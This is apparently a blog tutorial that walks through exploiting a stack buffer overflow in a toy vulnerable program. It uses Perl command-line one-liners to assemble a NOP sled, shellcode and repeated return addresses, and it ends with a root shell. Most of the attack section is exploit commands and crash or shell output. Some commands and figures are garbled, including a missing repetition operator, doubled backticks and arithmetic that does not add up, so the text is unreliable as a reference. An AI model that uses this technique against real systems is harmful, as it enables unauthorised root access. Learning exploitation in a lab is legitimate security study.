After reading our previous post:Exploiting buffer overflows using command line it’s time to do Exploit Shell code using Command-line but I think you do want to clear your doubt of previous post , so let’s know about how the number 38 was calculated in our previous case using with some simple module math.
(408 byte-200 bytes of NOP - 53 byte of shellcode) / 4 byte of address = 38.75
when the Perl command was wrapped in bark-ticks ( ` ), they may be chain to make a larger series of character or numeric values for example we can make a 408-byte of string that can be using for attack and feed it to our vulnerable buffer.c program as follow.
root@buffercode:$ ./buffer mr `perl -e 'print "\x90"x200'; ``cat sc ``perl -e 'print "\xc0\xe5\xff\xff"38';` Segmentation fault
this 405 byte string is used as second argument and then we create buffer overflow as follow:
:p 200 byte of NOPs (“\x90”).
:p 53 bytes of shellcode.
:p 152 bytes of repeated return address.
Since our buffer-overflow attack is only 405 bytes , as we expected , it crashed.It simply means our repeated address has some misalignment and they are overriding the saved return address.
Now we need to increment the number of NOPs to Exploit Shell code using Command-line as follows:
$./buffer hello `perl -e 'print "\x90"x201'; ``cat sc ``perl -e 'print "\xc0\xe5\xff\xff"38';` segmentation fault $./buffer hello `perl -e 'print "\x90"x202'; ``cat sc ``perl -e 'print "\xc0\xe5\xff\xff"38';` $./buffer hello `perl -e 'print "\x90"x203'; ``cat sc ``perl -e 'print "\xc0\xe5\xff\xff"38';` Hello e'^^ttyFF ......truncated for bravity . . . sh-2.05b#
Woooooooooo it worked , now we are root user 😉 Here important thing is that how we get access of root user from command line by incrementing the buffer value.
We will update our next tutorial at 6 :00 pm sharp tomorrow , so please follow us on facebook and subscribe our newsletter.